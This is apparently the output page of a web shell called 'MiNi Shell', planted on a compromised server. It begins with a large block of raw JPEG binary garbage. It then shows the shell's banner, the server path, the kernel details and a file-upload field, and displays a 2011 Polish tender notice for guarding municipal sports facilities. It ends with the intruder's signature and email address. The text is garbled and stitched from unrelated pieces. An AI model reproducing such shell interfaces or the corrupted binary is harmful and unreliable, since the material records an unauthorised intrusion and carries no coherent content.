JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111129/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20111129/401974-N-2011.html

<p class="kh_header"><b>Piotrków Trybunalski: OCHRONA OBIEKTÓW OŚRODKA SPORTU I REKREACJI ZNAJDUJĄCYCH SIĘ  W PIOTRKOWIE TRYBUNALSKIM W OKRESIE OD 01.01.2012 R. DO 31.12.2012R.</b><br>
<b>Numer ogłoszenia: 401974 - 2011; data zamieszczenia: 29.11.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Sportu i Rekreacji , al. 3 Maja 6b, 97-300 Piotrków Trybunalski, woj. łódzkie, tel. 044 7326569, 7326651, faks 044 7325733.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osirpt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> OCHRONA OBIEKTÓW OŚRODKA SPORTU I REKREACJI ZNAJDUJĄCYCH SIĘ  W PIOTRKOWIE TRYBUNALSKIM W OKRESIE OD 01.01.2012 R. DO 31.12.2012R..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Ochrona obiektów i mienia:
Ośrodka Sportu i Rekreacji w Piotrkowie Trybunalskim
przed kradzieżami z włamaniem, uszkodzeniami, pożarami oraz nadzór nad przestrzeganiem  ustalonego przez Zamawiającego ładu i porządku: 
a) przez jednego  nielicencjonowanego pracownika ochrony fizycznej:
-  Centrum Rekreacyjno-Rehabilitacyjnego przy ul. Belzackiej 108/110,  
-  Hali RELAX przy Al. 3 Maja 6 B,
- Lodowiska/Kortów Tenisowych w parku im. ks. J. Poniatowskiego   przy ul.   Żeromskiego 22,
-  Boiska Sportowego przy ul. Broniewskiego 18,
b) przez dwóch  nielicencjonowanych pracowników ochrony fizycznej:
-  Stadionu Miejskiego przy ul. Żwirki 6.

Dni i czas wykonywania usługi:
     
a)  Centrum Rekreacyjno-Rehabilitacyjne przy ul. Belzackiej 108/110
w dni powszednie od godziny 16:00 do godziny 8:00 rano dnia następnego, a w dni świąteczne, soboty, niedziele, dni wolne od pracy system całodobowy.
b) Hala RELAX przy Al. 3 Maja 6 B
w dni powszednie, w dni świąteczne, soboty, niedziele, dni wolne od pracy system  całodobowy.
c) Lodowisko / Korty Tenisowe w parku im. ks. J. Poniatowskiego  
przy ul. Żeromskiego 22
w dni powszednie, w dni świąteczne, soboty, niedziele, dni wolne od pracy od godziny 20:00  do godziny 8:00 rano dnia następnego, a w dniach:
     - 01.01.2012 r. od godziny 00 do godziny 14:00,
     - 07.04.2012 r. system całodobowy,
     - 08.04.2012 r. system całodobowy,
     - 09.04.2012 r. system całodobowy,
     - 07.06.2012 r. system całodobowy,
     - 15.08.2012 r. system całodobowy,
     - 01.11.2012 r. system całodobowy,
     - 11.11.2012 r. system całodobowy,
     - 24.12.2012 r. od godziny 15:00 do 26.12.2012r. do godziny 14:00,
     - 31.12.2012 r. od godziny 16:00.
d) Boisko Sportowe przy ul. Broniewskiego 18 
w dni powszednie od godziny 18:00 do godziny 10:00 rano dnia następnego, a  w dni świąteczne , soboty, niedziele,  dni  wolne od pracy system całodobowy.
e) Stadion Miejski przy ul. Żwirki 6
w dni powszednie od godziny 22:00 do godziny 7:00 rano dnia następnego , a w dni świąteczne , soboty, niedziele,  dni  wolne od pracy system całodobowy.
3. Zamawiający zastrzega sobie prawo zmiany ilości godzin strzeżenia w zależności od bieżących potrzeb Ośrodka Sportu i Rekreacji. Zmiana dokonywana będzie przez Zamawiającego pismem, przekazanym faxem lub e-mailem z 24 godzinnym wyprzedzeniem.
Wykonawca zobowiązany jest potwierdzić fakt otrzymania pisma w ciągu 1 godziny od  otrzymania. Zmiana w tym zakresie nie będzie traktowana jako zmiana umowy.
4. Ponadto zamówieniem objęte jest;
1)  wykonywanie ciągłej lustracji strzeżonych obiektów,
2) ochrona obiektów przed działaniami osób trzecich zagrażającymi ich bezpieczeństwu,
3) zabezpieczenie mienia znajdującego się na obiektach przed kradzieżą i zniszczeniem,
4) współdziałanie z jednostkami ochrony przeciwpożarowej w przypadku zagrożenia pożarowego,
5) współdziałanie z właściwymi terytorialnie jednostkami Policji w zakresie bezpieczeństwa obiektów i ochrony mienia,
6) niezwłocznego powiadomienia Zamawiającego, właściwej terytorialnie jednostki Policji albo prokuratury o zdarzeniach przestępczych i wykroczeniach zaistniałych na terenie obiektów oraz do podejmowania niezbędnych czynności celem zabezpieczenia miejsca przestępstwa do czasu przybycia organów ścigania,
7) patrolowanie wyznaczonego terenu,
8) utrzymania czystości na terenie obiektów,
9) prowadzenie książki pełnienia służby,
10) instalacja pilota napadowego lub innego środka łączności na obiektach: 
- Centrum Rekreacyjno - Rehabilitacyjne, 
- Hala RELAX,  
- Lodowisko/Korty Tenisowe, 
- Stadion Miejski, 
- Boisko Sportowe.
Wykonawca ponosi koszty łączy oraz koszty ich instalacji i eksploatacji,
11) wspomaganie nielicencjonowanego/ych pracownika/pracowników ochrony fizycznej w czasie dyżuru przez grupę szybkiego reagowania dyżurującą całodobowo, składającą się z pracowników ochrony fizycznej posiadających licencje II- stopnia - ( maksymalny czas reakcji 10 min. od momentu zgłoszenia) i  reagującą na powiadomienie wykonane pilotem napadowym lub innym środkiem łączności z terenu: Centrum Rekreacyjno - Rehabilitacyjnego, Hali RELAX,  Lodowiska/Kortów Tenisowych, Stadionu Miejskiego, Boiska Sportowego oraz przyjazdy, przejazdy grupy szybkiego reagowania w ramach działań  prewencyjnych i kontrolnych,
12) wykonywanie prac gospodarczych w czasie nie kolidującym ze ścisłą ochroną obiektów tj. pracownik ochrony fizycznej zobowiązany jest do utrzymania we właściwym stanie terenu przy wejściu do w/w obiektów Zamawiającego,
13) prowadzenie książki wejść i wyjść wszystkich osób przebywających w budynkach Ośrodka  w następujących godzinach: 
- Centrum Rekreacyjno - Rehabilitacyjne w dni powszednie po godzinie 22:00  , a w dni świąteczne, soboty, niedziele, dni wolne od pracy przez całą dobę,
- Hala RELAX  - pomieszczenia administracyjne III piętro w dni powszednie po godzinie 15:30,  a w dni świąteczne, soboty, niedziele, dni wolne od pracy przez całą dobę,
- Hala RELAX w dni powszednie po godzinie 22:00 , a w dni świąteczne, soboty, niedziele, dni wolne od pracy przez całą dobę.
- Lodowisko / Korty Tenisowe w dni powszednie, w dni świąteczne, soboty,  niedziele, dni wolne od pracy po godzinie 20:00 a dniach:
     - 01.01.2012 r. od godziny 00 do godziny 14:00,
     - 07.04.2012 r. przez całą dobę,
     - 08.04.2012 r. przez całą dobę,
     - 09.04.2012 r. przez całą dobę,
     - 07.06.2012 r. przez całą dobę,
     - 15.08.2012 r. przez całą dobę,
     - 01.11.2012 r. przez całą dobę,
     - 11.11.2012 r. przez całą dobę,
     - 24.12.2012 r. od godziny 15:00 do 26.12.2012 r. do godziny 14:00,
     - 31.12.2012 r. od godziny 16:00.
- Boisko Sportowe w dni powszednie po godzinie 18:00, a w dni świąteczne ,    soboty, niedziele, dni wolne od pracy przez całą dobę.
- Stadion Miejski w dni powszednie po godzinie 22:00, a w dni świąteczne , soboty, niedziele, dni wolne od pracy przez całą dobę.
5. W przypadku, gdy w chronionych obiektach funkcjonują lub będą funkcjonować techniczne środki ochrony mienia (np. instalacje przeciwpożarowe, antywłamaniowe powiadamiające, monitorujące, alarmowe itp.) obowiązkiem pracowników Wykonawcy będzie również obsługa tych urządzeń, wyszczególnionych w regulaminach obiektów.
6. Wszystkie usługi objęte przedmiotem zamówienia Wykonawca będzie realizował z wykorzystaniem własnych pracowników, środków sprzętu, z zastrzeżeniem postanowień pkt 7 i 8.
7. Wykonawca może powierzyć wykonanie przedmiotu osobom trzecim, w przypadku  złożenia takiego oświadczenia w formularzu oferty.
8. W przypadku naruszenia postanowień pkt 7 Zamawiający ma prawo do natychmiastowego rozwiązania umowy.
9. Osoba wykonująca nadzór nad pracownikami ochrony fizycznej musi posiadać licencję pracownika ochrony fizycznej I - stopnia.
10. Przed przystąpieniem do świadczenia usługi przez Wykonawcę, Strony wspólnie dokonają oględzin strzeżonego mienia i sporządzą protokół zdawczo-odbiorczy w terminie uzgodnionym przez obie Strony, nie później jednak, niż w ciągu miesiąca od daty zawarcia umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Poświadczoną za zgodność z oryginałem kserokopię Koncesji MSWiA uprawniającą do świadczenia usług w zakresie ochrony  obiektów i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazu należycie wykonanej co najmniej jednej usługi o podobnej wartości  i odpowiadającej rodzajem przedmiotowi niniejszego zamówienia, tj. całodobowa ochrona obiektów, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie. Do oferty należy dołączyć  referencje potwierdzające, że usługa została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazu osób przeznaczonych do realizacji zamówienia i spełniające następujące wymagania: 
 - osoba wykonująca nadzór nad pracownikami ochrony fizycznej musi posiadać licencję pracownika ochrony fizycznej I-stopnia,
- osoby z grupy szybkiego reagowania składającą się z pracowników ochrony fizycznej posiadających licencje II- stopnia,
- osoby, które będą uczestniczyć w wykonywaniu zamówienia - nielicencjonowani pracownicy ochrony fizycznej.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazu osób przeznaczonych do realizacji zamówienia i spełniające następujące wymagania: 
 - osoba wykonująca nadzór nad pracownikami ochrony fizycznej musi posiadać licencję pracownika ochrony fizycznej I-stopnia,
- osoby z grupy szybkiego reagowania składającą się z pracowników ochrony fizycznej posiadających licencje II- stopnia,
- osoby, które będą uczestniczyć w wykonywaniu zamówienia - nielicencjonowani pracownicy ochrony fizycznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzonej za zgodność z oryginałem kopii opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej przedmiotem zamówienia  na wartość co najmniej 250.000 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	Formularz Ofertowy,
b)	Kserokopia Regulaminu  Pracy Służby Dozoru obowiązujący u Wykonawcy .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany umowy będą mogły nastąpić w następujących okolicznościach:
a) zaistnienia,  po  zawarciu umowy,  przypadku  siły wyższej,  przez którą,  na potrzeby niniejszego warunku rozumieć należy zdarzenie zewnętrzne wobec łączącej strony więzi prawnej:
- o charakterze niezależnym od stron,
- którego strony nie mogły przewidzieć przed zawarciem umowy,
- którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności,
- której nie można przypisać drugiej stronie;
Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia;
b) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron;
c) powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie   rozbieżności   i   doprecyzowanie   umowy   w   celu   jednoznacznej interpretacji jej zapisów przez strony,
d) dopuszcza się zmianę stawki VAT w razie ustawowej zmiany przepisów o VAT, stosownie do zmian dokonywanych w tym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.osirpt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Sportu i Rekreacji  
97- 300 Piotrków Trybunalski
Al. 3 Maja 6B
pokój 315.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.12.2011 godzina 10:00, miejsce: Ośrodek Sportu i Rekreacji  
97- 300 Piotrków Trybunalski
Al. 3 Maja 6B
pokój 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com